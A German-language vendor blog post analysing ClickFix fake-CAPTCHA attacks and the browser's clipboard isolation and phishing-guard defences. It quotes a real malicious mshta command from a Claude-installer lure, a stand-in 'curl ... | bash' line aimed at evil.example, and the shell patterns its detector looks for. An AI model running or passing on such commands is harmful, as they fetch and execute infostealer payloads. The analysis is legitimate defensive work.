Eine Seite gibt vor, ein CAPTCHA zu sein. Während der Nutzer die „Ich bin kein Roboter"-Anweisungen liest, schreibt die Seite im Stillen einen PowerShell-Befehl in die Zwischenablage. Dann fordert sie den Nutzer auf, Win+R zu drücken und „zur Verifizierung" einzufügen. Der Mensch ist der Exploit. Das ist ClickFix, und es ist ehrlich schwer zu stoppen – nicht weil es clever ist, sondern weil es fast jede Verteidigung umgeht, die ein Browser bieten sollte.

Am 9. April 2026 beobachtete Rapid7 einen Nutzer, der eine Seite besuchte, die wie eine Download-Seite für Anthropics Claude-Desktop-App aussah. Die Seite forderte ihn auf, „zu verifizieren, dass er ein Mensch sei". Als er den Button klickte, legte die Seite folgenden String auf die Zwischenablage:

mshta https://download-version.1-5-8.com/claude.msixbundle

Dann wies sie ihn an, Win+R zu drücken und einzufügen. Der Nutzer tat es. mshta.exe ist ein Windows-Binary, das HTML Applications ausführt und seit mehr als zwanzig Jahren mit jeder Version des Betriebssystems ausgeliefert wird. Was mshta ausführte, war eine Kette, die in einem Infostealer auf dem Host endete. Kein Browser-Bug wurde berührt. Keine Code-Signatur-Prüfung wurde umgangen. Kein Erhöhungs-Dialog erschien. Der Browser tat genau das, worum der Nutzer ihn bat; das Betriebssystem tat genau das, worum der Nutzer es bat. Der Angreifer fragte einfach durch beide hindurch, mit der Zwischenablage als Leitung.

Vier Tage später machte Booking.com bekannt, dass sein Hotelpartner-Netzwerk von derselben Technik getroffen worden war – von Microsoft als Storm-1865 verfolgt – mit XWorm und VenomRAT als finaler Payload. Microsoft selbst führte in einer früheren Analyse siebenundvierzig Prozent der Initial-Access-Einbrüche im Jahr 2025 auf dieses eine Muster zurück. Die Booking.com-Partner klickten keinen bösartigen Anhang an. Sie luden keine ausführbare Datei herunter. Sie drückten Win+R und fügten etwas ein. Mehr braucht es inzwischen nicht.

Warum ClickFix funktioniert.

Die Angriffskette passt auf eine Serviette.

Die ClickFix-Kill-Chain. Die Seite ist eine normale Webseite. Die Zwischenablage ist eine normale Zwischenablage. Win+R ist eine normale Tastenkombination. mshta.exe ist ein normales Windows-Werkzeug. Nichts in dieser Kette ist ein Exploit im klassischen Sinne – der Exploit ist die Folge gewöhnlicher Operationen, die vom Menschen in der Mitte ausgeführt wird.

Jede Verteidigung, nach der man üblicherweise greift, hat schon verloren, wenn die Payload läuft. Der URL-Reputationsfilter? Der Angreifer hat download-version.1-5-8.com gestern registriert. Die Browser-Sandbox? Die Payload versucht gar nicht, aus dem Browser auszubrechen – sie bittet einfach den Menschen, sie auszuführen. Die Code-Signatur-Prüfung der ausführbaren Datei? mshta.exe ist ein signiertes Microsoft-Binary. Der Erhöhungs-Dialog? mshta braucht keine Erhöhung, um eine HTA herunterzuladen und auszuführen. Der Endpoint-Agent? Er sieht, dass der Elternprozess explorer.exe ist, gestartet durch einen Tastendruck des Nutzers, was sich nicht davon unterscheidet, dass der Nutzer buchstäblich irgendetwas anderes auf seinem Computer ausführt.

ClickFix nimmt den einen Teil des Computers, den die Industrie nie patchen konnte – die Person, die davor sitzt – und macht sie zur Ausführungsstufe. Genau deshalb ist es jetzt überall. Die Storm-1865-Kampagne nutzte einen mit Booking.com gebrandeten Köder. Der Rapid7-Fall nutzte einen Claude-Installer-Köder. Übernahmen von Facebook-Creator-Konten laufen seit Monaten mit derselben Technik. Der Köder wechselt wöchentlich; der Mechanismus nicht.

Derselbe Angriff, gerichtet auf macOS.

Der Rapid7-Mitschnitt, der Booking.com-Vorfall und die Facebook-Creator-Übernahmen zielten alle auf Windows-Hosts. Das ist ein echter Bias in den Daten dieser Woche – die ClickFix-Industrie ist im Moment überwiegend eine Windows-Industrie –, aber es ist eine Eigenschaft des Marktes, nicht eine Eigenschaft des Angriffs. ClickFix ist eine Zwischenablage-und-Tastatur-Technik. Es ist ihr egal, an welchem Betriebssystem die Tastatur hängt.

Auf macOS sind die Ersetzungen mechanisch. Aus Win+R wird Cmd+Space und Terminal – oder neuerdings Script Editor. Aus der mshta-Zeile wird curl -s https://evil.example | bash, oder ein osascript -e-Einzeiler, oder ein base64-kodiertes AppleScript do shell script. Das falsche CAPTCHA bleibt das falsche CAPTCHA; das Schreiben in die Zwischenablage bleibt das Schreiben in die Zwischenablage; das „Verifizieren Sie, dass Sie ein Mensch sind"-Skript der Seite ändert zwei Sätze. Bitdefender hat Anfang dieses Jahres Mac-gezielte ClickFix-Köder dokumentiert, die Atomic Stealer ausliefern, und – wie wir gleich sehen werden – die Tatsache, dass Apple es für nötig hielt, in macOS 26.4 eine Antwort auf Plattform-Ebene auszuliefern, ist das klarstmögliche Signal dafür, dass die Mac-Variante nicht hypothetisch ist.

Für Bromure ist dies der tragende Fall. Bromure läuft auf macOS. Jeder Nutzer, an den wir ausliefern, ist ein macOS-ClickFix-Ziel, bevor er irgendetwas anderes ist. Wenn wir im nächsten Abschnitt über Zwischenablage-Isolation und phishing-guard sprechen, reden wir nicht über eine Windows-Kuriosität – wir reden über eine Technik, die bereits auf dem tatsächlichen Betriebssystem unserer Nutzer gelandet ist und die die Plattform, die sie gewählt haben, unvollkommen zu patchen versucht.

Bromures ehrliche Haltung gegen ClickFix.

Wir würden Ihnen gerne sagen, dass Bromure ClickFix verhindert. Tut es nicht. Was Bromure tut, ist, ein bislang niemandem gehörendes Problem zu übernehmen – die Zwischenablage als angreifergesteuerte Leitung zwischen Browser und Host – und es hinter zwei Schichten zu setzen, an denen wir aktiv arbeiten, eine architektonische und eine plugin-basierte. Keine ist eine fertige Antwort. Beide sind besser als nichts. Hier ist genau, wo sie heute stehen.

Schicht eins — Zwischenablage-Isolation als Option, nicht als Default.

Bromure führt jeden Tab in seiner eigenen wegwerfbaren Linux-VM aus. Die Seite läuft darin; der Browser läuft darin; der navigator.clipboard-Schreibvorgang des falschen CAPTCHA passiert darin. Die Frage ist, womit die Zwischenablage der VM verbunden ist. Standardmäßig ist sie heute mit der macOS-Host-Zwischenablage verbunden – denn meistens ist die Zwischenablage der Weg, wie man eine URL aus dem Browser in Messages kopiert oder ein Passwort aus 1Password in ein Login-Formular einfügt. Das standardmäßig zu brechen, würde den Browser feindselig in der Nutzung machen.

Der Total-Isolations-Modus kehrt diesen Default um. In der totalen Isolation wird die Zwischenablage-Brücke zwischen der VM und dem macOS-Host gekappt. Eine Seite innerhalb des Tabs kann weiterhin in die eigene Zwischenablage der VM schreiben – und der Nutzer kann weiterhin innerhalb des Linux-Terminals dieser VM einfügen, wenn er wirklich will –, aber die Host-Zwischenablage, in die der Nutzer in Win+R oder in Terminal.app oder in Spotlight einfügt, ist eine andere Zwischenablage. Der mshta https://...-String der Seite erreicht niemals den Host-Einfüge-Puffer. Die ClickFix-Kette bricht bei Stufe 2 ab.

Zwei Haltungen, derselbe Tab, dieselbe Seite. Links: Zwischenablage-Teilen an (heutiger Default): Der Schreibvorgang der Seite landet in der Host-Zwischenablage, und das Win+R-Einfügen des Nutzers führt ihn aus. Rechts: totale Isolation: die VM-Zwischenablage und die Host-Zwischenablage sind unterschiedliche Puffer, und der Angriffsstring überquert nie die Grenze. Der Kompromiss ist real – das Kopieren einer URL aus einem Tab in Ihren Messenger funktioniert nicht mehr.

Die ehrliche Lesart der totalen Isolation: Sie ist eine saubere architektonische Antwort auf ClickFix für die Nutzer, die sie wollen, und sie ist eine Nutzbarkeits-Steuer, die wir nicht als Default für alle ausliefern wollen. Die meisten Leute kopieren und fügen Dutzende Male am Tag zwischen ihrem Browser und ihren Notizen, oder ihrem Messenger, oder einem Dokument, an dem sie arbeiten, ein. Diesen Pfad zu einem „Ist aus, suchen Sie die Einstellung" zu machen, um Kopieren/Einfügen zurückzubekommen, würde bedeuten, dass die meisten Nutzer ihn innerhalb einer Woche wieder einschalten – und damit hätten wir ihnen in einem einzigen Zug den Wert des Zwischenablage-Teilens und die Kosten von Sicherheit beigebracht. Das ist nicht die Lektion, die wir ihnen vermitteln wollen.

Also ist totale Isolation für den Nutzer da, der sie will, dokumentiert, und sie ist das Stärkste, was die Architektur zu ClickFix zu sagen hat. Sie ist nicht das, was die meisten Nutzer verwenden werden.

Schicht zwei — das Anti-Phishing-Plugin, heute und morgen.

Für die Default-Haltung – Zwischenablage-Brücke an – liefern wir eine zweite Verteidigungslinie in Bromures Anti-Phishing-Komponente aus, die wir phishing-guard nennen. Es lohnt sich zu beschreiben, was sie tut, denn die meiste Industrie tut das nicht, und wir glauben, dass es der Anfang der richtigen Antwort ist, nicht das Ende.

Phishing-guard hookt die drei Einstiegspunkte für das Schreiben in die Zwischenablage innerhalb des Chromium der Tab-VM: die modernen APIs navigator.clipboard.writeText und clipboard.write sowie den alten Pfad document.execCommand('copy'), den ältere Seiten noch nutzen. Wann immer eine Seite Text in die Zwischenablage schreibt, bekommt phishing-guard ihn zu sehen, bevor die Host-Zwischenablage ihn sieht.

Dann führt es zwei Tests parallel aus. Erstens: Es prüft den Zwischenablage-Inhalt gegen eine Menge regulärer Ausdrücke für Shell-Befehle – wir pflegen zehn davon, abgestimmt auf die Payloads, die wir tatsächlich in freier Wildbahn sehen: powershell-Aufrufe, mshta https://-Muster, curl ... | bash-Pipes, base64-kodierte PowerShell-Blobs, certutil -urlcache, rundll32-Tricks und ein paar andere. Zweitens: Es scannt die gerenderte Seite nach Anweisungsmustern, die dem Nutzer sagen, den Zwischenablage-Inhalt auszuführen – dreizehn davon, mehrsprachig – Dinge wie „Drücken Sie Win+R", „öffnen Sie Terminal", „fügen Sie ein, um zu verifizieren, dass Sie ein Mensch sind", auf Englisch, Französisch, Spanisch, Deutsch, Portugiesisch, Italienisch, Niederländisch, Polnisch, Japanisch, Koreanisch, Chinesisch, Arabisch und Russisch.

Wenn beide auslösen – ein Zwischenablage-Schreibvorgang, der wie ein Shell-Befehl aussieht, auf einer Seite, deren Text den Nutzer zum Einfügen anleitet –, schickt phishing-guard die Kandidaten-Payload an ein Sprachmodell-Urteil und blendet eine Warnung im Browser ein, wenn das Urteil feindselig ausfällt.

Zwei ehrliche Einschränkungen, selbst wenn das so funktioniert, wie vorgesehen: Der LLM-Aufruf hat Latenzkosten, sodass ein schneller Nutzer einfügen kann, bevor das Urteil zurückkommt; und Regex-plus-Seitentext fängt die Form von ClickFix, aber nicht jede Variante (eine Seite, die den Nutzer über ein eingebettetes Video statt über Text anleitet, würde heute durch den Muster-Scan rutschen). Wir arbeiten aktiv daran, den Blockpunkt zu härten und das Erkennungsfenster zu verkleinern. Das sind Engineering-Probleme mit bekannten Antworten; wir sind nur noch nicht fertig mit ihnen.

Was Apple in macOS 26.4 ausgeliefert hat — und wo es zu kurz greift.

Am 24. März 2026 hat Apple dieselbe Form der Idee auf Betriebssystem-Ebene ausgeliefert. macOS 26.4 fügte der Erstanbieter-Terminal.app einen Einfüge-Warnungs-Dialog hinzu: Wenn der Nutzer in ein Terminal-Fenster einfügt, prüft macOS die Zwischenablage und zeigt unter bestimmten Bedingungen einen blockierenden Dialog mit dem Text „Möglicherweise Schadsoftware. Einfügen blockiert. Ihr Mac wurde nicht beschädigt. Betrüger ermuntern häufig dazu, Text in Terminal einzufügen, um Ihren Mac zu schädigen oder Ihre Privatsphäre zu kompromittieren." Das ist ein guter Schritt, und wir sind froh, dass Apple ihn gemacht hat. Wir finden auch, dass es sich lohnt, präzise zu sein, was er ist und was nicht.

Was Apples macOS-26.4-Einfüge-Warnung abdeckt und was nicht. Die erste Spalte ist die Angriffsfläche, gegen die sie entworfen wurde – Safari schreibt einen Shell-Befehl, der Nutzer fügt in Terminal.app ein. Die anderen Spalten sind die Flächen, auf die Angreifer bereits ausweichen: Nicht-Apple-Terminals, Script Editor und ganz Windows, wo die meisten ClickFix-Angriffe ohnehin landen.

Drei Einschränkungen, die es zu benennen lohnt. Die erste ist, dass die Warnung in Terminal.app sitzt, nicht in der Pasteboard-Schicht von macOS. iTerm2, Alacritty, Warp, Kitty und jedes andere Terminal, das die Mac-Entwicklergemeinde tatsächlich benutzt, erbt die Prüfung nicht. Das ist kein Versehen von Apple – es ist eine Scope-Entscheidung –, aber es bedeutet, dass genau die Nutzerbasis, die am ehesten einen zufälligen Shell-Befehl einfügt, Ingenieure mit ihrer eigenen Terminal-Vorliebe, genau die Nutzerbasis ist, die dieses Feature nicht schützt.

Die zweite ist Script Editor. Am 8. April 2026 berichteten Jamf Threat Labs, dass Atomic-Stealer-Betreiber ihr ClickFix-Social-Engineering-Skript bereits von „öffnen Sie Terminal und fügen Sie das ein" auf „öffnen Sie Script Editor und fügen Sie das ein" umgestellt hatten, weil Script Editor AppleScript und Shell-Befehle über do shell script ausführt und nicht von der 26.4-Warnung abgedeckt wird. Jamfs Thijs Xhaflaire brachte es so nüchtern auf den Punkt, wie es nur geht: „Indem der Angreifer die Ausführung von Terminal auf Script Editor verlagert, behält er einen vertrauten Zustellmechanismus bei und ändert zugleich still und leise, wie und wo der Befehl tatsächlich ausgeführt wird." Die Industrie brauchte zwei Wochen, um die Maßnahme zu umgehen. Das ist keine Kritik an Apple; es ist eine Kritik an der Form des Problems. Man kann ClickFix nicht lösen, indem man ein einziges Ziel patcht.

Die dritte Einschränkung ist die größte und die am wenigsten diskutierte: macOS 26.4 schützt Mac-Nutzer. Die tatsächliche ClickFix-Industrie – die Storm-1865-Affiliate-Struktur hinter dem Booking.com-Vorfall, die gefälschte Claude-Installer-Kampagne und der Löwenanteil der 47 Prozent der Initial-Access-Zahlen von 2025 – liefert Windows-Payloads aus, nutzt Win+R, ruft mshta und PowerShell auf und landet auf Windows-Hosts. Apple kann Terminal.app perfekt schützen und bewegt damit in dieser Flotte keine einzige Nadel. Für die ClickFix-Post-mortems, die Sie dieses Jahr lesen werden, ist das Betriebssystem mit der Einfüge-Warnung meistens nicht das, das das Opfer benutzt hat.

Was Apple richtig gemacht hat

Zwischenablage-zu-Shell-Befehl als sicherheitsrelevanten Einfüge-Pfad zu behandeln und ihn auf der Betriebssystem-Ebene zu prüfen, auf der jede App im System den Nutzen hat. Diese Einordnung ist richtig. Die einmalige Abfrage, der gebrandete Dialog, die Formulierung „Ihr Mac wurde nicht beschädigt" – alles gut gemacht. Das ist die erste Anerkennung auf Plattform-Ebene, dass die Zwischenablage ein Bedrohungskanal ist.

Warum es nicht die ganze Antwort ist

Die Prüfung sitzt in Terminal.app, nicht im Pasteboard-Subsystem. Sie ist einmalig. Script Editor ist bereits eine Umgehung. Und die Opferpopulation, für die das Feature entworfen wurde, ist ein kleiner Bruchteil der Population, auf die ClickFix tatsächlich zielt. Apple hat ein gutes Feature ausgeliefert. Es hat keine Lösung ausgeliefert, und wir glauben nicht, dass Apple das behauptet.

Was der Browser einzigartig leisten kann

Der Browser sieht die Seite, die in die Zwischenablage schreibt, und den Text, mit dem die Seite den Nutzer anleitet. Das Betriebssystem sieht nur das Ende der Kette. Zwei getrennte Signale – der Ort des Zwischenablage-Schreibens und der Social-Engineering-Text der Seite – ergeben zusammen ein Urteil, auf das das Betriebssystem allein keinen Zugriff hat. Das ist das Argument dafür, dass der Browser einen Teil dieser Arbeit übernimmt.

Was der Browser nicht erreichen kann

Sobald der Nutzer in ein echtes Terminal, einen echten Ausführen-Dialog, einen echten Script Editor einfügt, hat die Payload alles verlassen, was der Browser sehen kann. Der Host muss seinen Teil tragen. macOS 26.4 ist der Host, der seinen Teil trägt, an den Stellen, die es abdecken wollte. Windows muss dasselbe tun. Das ist ein Problem, das beide Enden braucht.

Die These, die wir zu verteidigen bereit sind.

Zwanzig Jahre lang hat die Industrie auf Social-Engineering-Angriffe mit Postern geantwortet. „Klicken Sie keine verdächtigen Links." „Seien Sie sich Phishing-Versuchen bewusst." „Denken Sie nach, bevor Sie einfügen." Wenn ein Nutzer auf ClickFix hereinfällt, ist die öffentliche Reaktion meistens eine Variation von der Nutzer hätte es besser wissen müssen – Artikel, die erklären, wie man das falsche CAPTCHA erkennt, Schulungsmodule, jährliche Security-Awareness-Quizze, Schuld höflich nach unten geschoben. Die Annahme unter all dem ist, dass Phishing im Kern ein menschliches Problem sei und die technische Schicht getan habe, was sie kann.

Das glauben wir nicht. Wir glauben, dass ClickFix, und jede andere Zwischenablage-und-Tastatur-Social-Engineering-Technik, ein technisches Problem ist, das die technische Schicht konsequent abgelehnt hat, sich anzueignen. Die Zwischenablage ist ein nicht-authentifizierter Nachrichtenbus zwischen jeder Webseite und jeder anderen App auf dem Betriebssystem. Der Ausführen-Dialog akzeptiert jeden String. Terminal führt aus, was in ihm landet. Keines dieser Designs wurde gegen den Angreifer auditiert, den die Zwischenablage jetzt tatsächlich hat. Keines davon wird sich selbst reparieren.

Die richtige Antwort ist Arbeit – innerhalb von Browsern, innerhalb von Betriebssystemen, innerhalb ökosystemischer Zusammenarbeit –, damit der Weg von der Zwischenablage zum Shell-Befehl etwas wird, bei dem die Maschine bereit ist, im Namen des Nutzers einzugreifen. macOS 26.4 ist ein Schritt; Windows braucht seinen eigenen. phishing-guard ist ein Schritt; den Zwischenablage-Schreibvorgang hart zu blockieren, eine zwischenablage-spezifische Warnung statt eines generischen Spinners auszuliefern und die Urteilslatenz so zu verkürzen, dass sie ein schnelles Einfügen schlägt – das sind die nächsten Schritte. Total-Isolations-Modus ist ein Schritt; ihn im Alltag leichter lebbar zu machen, ist der Schritt danach.

Nichts davon ist ein Poster. Nichts davon verlangt vom Nutzer, ein falsches CAPTCHA schneller zu erkennen oder „über Links zu fahren" oder zum Sicherheitsexperten zu werden, um einen Browser-Tab zu öffnen. Wir finden, dass Menschen keine Sicherheitsexperten werden sollten, um einen Browser-Tab zu öffnen. Die Technik hat das kaputtgemacht. Die Technik sollte es reparieren.

Bromures Roadmap gegen ClickFix ist die Form dieser Überzeugung. Was wir heute ausliefern, ist eine Teilverteidigung mit zwei Hebeln – einem starken, der Nutzbarkeit kostet, und einem weicheren, der so schnell Zähne bekommt, wie wir sie ihm wachsen lassen können. Was wir nächstes Jahr ausliefern, wird schärfer sein. Und wir werden weiterhin sagen, was das Feature tut und was nicht, in Beiträgen wie diesem, denn die Alternative – eine saubere Marketing-Seite mit einem Häkchen neben „ClickFix" auszuliefern – ist genau die Art Ding, die die Industrie an einen Ort gebracht hat, an dem Storm-1865 47 Prozent des Initial Access von 2025 leicht aussehen lassen kann.